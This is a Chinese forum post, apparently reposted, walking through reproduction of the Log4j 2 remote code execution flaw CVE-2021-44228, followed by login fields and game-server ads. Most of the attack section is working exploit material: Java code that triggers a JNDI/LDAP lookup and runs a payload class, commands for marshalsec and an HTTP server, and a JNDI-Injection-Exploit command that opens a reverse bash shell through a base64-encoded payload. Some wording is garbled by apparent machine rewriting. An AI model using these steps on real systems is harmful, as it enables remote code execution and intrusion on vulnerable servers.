CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞

形腿望舞 · 发表于 2022-1-28 22:23:31

影响范围

Apache Log4j 2.x < 2.15.0-rc2
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容[Java] 纯文本查看 复制代码import org.apache.logging.log4j.LogManager;import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public static void main(String[] args) { System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}"); }}Log4jRCE.java[Java] 纯文本查看 复制代码public class Log4jRCE { static { try { String [] cmd={"calc"}; java.lang.Runtime.getRuntime().exec(cmd).waitFor(); }catch (Exception e){ e.printStackTrace(); } } }注意，这里Log4jRCE.java不要放在项目里，我这里将Log4jRCE.class放到了D盘根目次，不然log4j.java运行时会读取到本地的Log4jRCE，就不是http长途下载了在D盘根目次[Asm] 纯文本查看 复制代码python -m http.server 8888然后执行[Asm] 纯文本查看 复制代码java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

长途RCE docker拉个镜像[Asm] 纯文本查看 复制代码docker pull vulfocus/log4j2-rce-2021-12-09:latestdocker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest先用网上公开的exp探测一下(此处为了引起不要的麻烦打码，你懂的)

反弹shell需要用到JNDI-Injection-Exploit启动⼀个rmi和ldap服务器，15c1貌似给ldap禁了但是rmi可以用，所以有了15c2
[Asm] 纯文本查看 复制代码java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxxxxxxxxxxxxxxxxuNzYuNDkvODQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 127.0.0.1
burp发包即可

毛病检测工具保举长亭科技免费推出的工具https://log4j2-detector.chaitin.cn

来源：http://www.12558.net
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

		自动登录	找回密码
密码			立即注册

游戏名称	游戏描述	开服状态	运营商	游戏链接
攻城掠地-仿官	全新玩法，觉醒武将，觉醒技能	每周新区	经典复古版本，长久稳定	进入游戏
巅峰新版攻	攻城掠地公益服	攻城掠地SF	新兵种、新武将（兵种）	进入游戏
攻城掠地公	散人玩家的天堂	新开		进入游戏
改版攻城掠	上线即可国战PK	稳定新区	全新改版，功能强大	进入游戏
少年江山	高福利高爆率	刚开一秒	江湖水落潜蛟龙	进入游戏
太古封魔录	开服送10亿钻石	福利多多	不用充钱也可升级	进入游戏
神魔之道	签到送元宝	稳定开新区	送豪华签到奖励	进入游戏
神奇三国	统帅三军，招揽名将	免费玩新区	激情国战，征战四方	进入游戏
龙符	三日豪礼领到爽	天天开新区	助你征战无双	进入游戏
王者之师	免费领豪华奖励	免费玩新区	6元送6888元宝	进入游戏